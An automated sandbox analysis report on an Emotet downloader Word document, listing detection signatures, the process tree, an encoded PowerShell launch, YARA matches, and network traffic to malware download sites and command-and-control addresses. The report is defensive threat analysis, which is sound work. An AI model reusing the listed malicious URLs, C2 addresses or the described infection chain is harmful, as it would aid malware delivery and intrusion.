
Analysis Report SecuriteInfo.com.W97M.DownLoader.4729.14228.5024

Overview

General Information

Sample Name:SecuriteInfo.com.W97M.DownLoader.4729.14228.5024 (renamed file extension from 5024 to doc)
Analysis ID:255714
MD5:f9b91fee08c01f6cbc69baac3afd1e06
SHA1:359e86979b15d729410850b99e749f8887cbe171
SHA256:55d4a00cac25d7c4b8a9313a5e777051554443c4dd24d9ef43299a6cfee82284


Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 1772 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6116 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 701.exe (PID: 64 cmdline: C:\Users\user\701.exe MD5: 230E89F02FDF32DEA29C530DB40D092C)
    • iprop.exe (PID: 5824 cmdline: C:\Windows\SysWOW64\kbdphags\iprop.exe MD5: 230E89F02FDF32DEA29C530DB40D092C)
  • svchost.exe (PID: 5812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5640 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1776 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4236 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3484 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 2516 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txt | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
Strings:
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xfa6:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfa6:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfa6:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
Source: C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txt | Rule: JoeSecurity_EmotetDownloader | Description: Yara detected Emotet Downloader | Author: Joe Security

Memory Dumps

Source: 00000003.00000002.244517553.0000000002310000.00000040.00000001.sdmp | Rule: JoeSecurity_Emotet | Description: Yara detected Emotet | Author: Joe Security
Source: 00000003.00000002.244529038.0000000002321000.00000020.00000001.sdmp | Rule: JoeSecurity_Emotet | Description: Yara detected Emotet | Author: Joe Security
Source: 00000004.00000002.495986403.0000000002290000.00000040.00000001.sdmp | Rule: JoeSecurity_Emotet | Description: Yara detected Emotet | Author: Joe Security
Source: 00000004.00000002.496008047.00000000022A1000.00000020.00000001.sdmp | Rule: JoeSecurity_Emotet | Description: Yara detected Emotet | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_022A1DA6 CryptDecodeObjectEx,4_2_022A1DA6
Source: C:\Users\user\701.exe | Code function: 3_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,3_2_00401078
Source: C:\Users\user\701.exe | Code function: 3_2_00444717 lstrlenA,FindFirstFileA,FindClose,3_2_00444717
Source: C:\Users\user\701.exe | Code function: 3_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,3_2_004047C0
Source: C:\Users\user\701.exe | Code function: 3_2_004028E0 FindFirstFileA,FindClose,3_2_004028E0
Source: C:\Users\user\701.exe | Code function: 3_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_004390BA
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,4_2_004390BA
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_00444717 lstrlenA,FindFirstFileA,FindClose,4_2_00444717
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_022A28B7 FindFirstFileW,FindNextFileW,FindClose,4_2_022A28B7
Source: winword.exe | Memory has grown: Private usage: 0MB later: 63MB
Source: global traffic | DNS query: name: jambino.us
Source: global traffic | TCP traffic: 192.168.2.4:49694 -> 67.20.112.81:80
Source: global traffic | TCP traffic: 192.168.2.4:49694 -> 67.20.112.81:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49701 -> 198.57.203.63:8080
Source: global traffic | TCP traffic: 192.168.2.4:49701 -> 198.57.203.63:8080
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Sat, 01 Aug 2020 22:22:04 GMTLast-Modified: Sat, 01 Aug 2020 22:22:04 GMTServer: Microsoft-IIS/8.5X-Powered-By: PHP/7.3.4Set-Cookie: 5f25eb0ce80db=1596320524; expires=Sat, 01-Aug-2020 22:23:04 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="6crd30176090.exe"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Sat, 01 Aug 2020 22:22:04 GMTContent-Length: 945664Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 aa eb 58 cd cb 85 0b cd cb 85 0b cd cb 85 0b ea 0d e8 0b c7 cb 85 0b ea 0d fe 0b da cb 85 0b cd cb 84 0b d3 c9 85 0b d3 99 10 0b d7 cb 85 0b d3 99 06 0b 46 cb 85 0b d3 99 01 0b 66 cb 85 0b d3 99 11 0b cc cb 85 0b cd cb 12 0b cc cb 85 0b d3 99 14 0b cc cb 85 0b 52 69 63 68 cd cb 85 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 87 33 24 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 0a 00 00 40 04 00 00 00 00 00 a1 54 05 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 0e 00 00 04 00 00 10 a8 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 f0 00 00 00 00 80 0d 00 c3 4d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 88 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 3c 0d 00 f4 0b 00 00 00 70 
0d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 68 0a 00 00 10 00 00 00 6a 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 2d 02 00 00 80 0a 00 00 2e 02 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 7f 00 00 00 b0 0c 00 00 40 00 00 00 9c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 9d 3f 00 00 00 30 0d 00 00 40 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 70 0d 00 00 04 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c3 4d 01 00 00 80 0d 00 00 4e 01 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program can
Source: global traffic | HTTP traffic detected: GET /tv/DYsPb/ HTTP/1.1 | Host: jambino.us | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-admin/t5Uujywz88/ HTTP/1.1 | Host: www.kappetijn.eu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ HTTP/1.1 | Referer: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ | Content-Type: multipart/form-data; boundary=---------------------------399627655407671 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 198.57.203.63:8080 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown | TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown | TCP traffic detected without corresponding DNS query: 187.64.128.197
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.203.63
Source: global traffic | HTTP traffic detected: GET /tv/DYsPb/ HTTP/1.1 | Host: jambino.us | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-admin/t5Uujywz88/ HTTP/1.1 | Host: www.kappetijn.eu | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: jambino.us
Source: unknown | HTTP traffic detected: POST /gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ HTTP/1.1 | Referer: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ | Content-Type: multipart/form-data; boundary=---------------------------399627655407671 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 198.57.203.63:8080 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Aug 2020 22:22:04 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=75Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: iprop.exe, 00000004.00000003.320371317.000000000297E000.00000004.00000001.sdmp | String found in binary or memory: http://187.64.128.197/tbRzD4ni/nXuiamtQ/R0HIm/LLkfv4Js4/nAwRPKJSXbvrF4/
Source: iprop.exe, 00000004.00000002.497725026.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlK
Source: iprop.exe, 00000004.00000002.497725026.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://198.57.203.63:8080/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZF
Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.dr | String found in binary or memory: http://jambino.us/tv/DYsPb/
Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.dr | String found in binary or memory: http://kevinley.com/logon/LXkUb/
Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.dr | String found in binary or memory: http://killingworthlabs.com/wp-admin/n3tq5u168132549/
Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.dr | String found in binary or memory: http://movewithketty.com/cgi-bin/HISOotVOG/
Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.497559980.0000019443C3F000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000006.00000002.497807660.0000019443E10000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000008.00000002.303157438.000002679A213000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.dr | String found in binary or memory: http://www.kappetijn.eu/wp-admin/t5Uujywz88/
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.302718278.000002679A241000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.302718278.000002679A241000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: iprop.exe, 00000004.00000003.320399798.0000000002994000.00000004.00000001.sdmp | String found in binary or memory: https://fs.microsoft.ck
Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303157438.000002679A213000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.302711074.000002679A245000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.302711074.000002679A245000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Users\user\701.exe | Code function: 3_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_0041E3E9
Source: C:\Users\user\701.exe | Code function: 3_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_00450B9A
Source: C:\Users\user\701.exe | Code function: 3_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,3_2_00424D66
Source: C:\Users\user\701.exe | Code function: 3_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_0044716C
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_0044716C
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_0041E3E9
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_00447984 GetKeyState,GetKeyState,GetKeyState,4_2_00447984
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,4_2_00450B9A
Source: C:\Windows\SysWOW64\kbdphags\iprop.exe | Code function: 4_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,4_2_00424D66

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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
Yara detected Emotet
Source: Yara match | File source: 00000003.00000002.244517553.0000000002310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.244529038.0000000002321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.495986403.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.496008047.00000000022A1000.00000020.00000001.sdmp, type: MEMORY
Yara detected Emotet Downloader
Source: Yara match | File source: C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txt, type: DROPPED

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)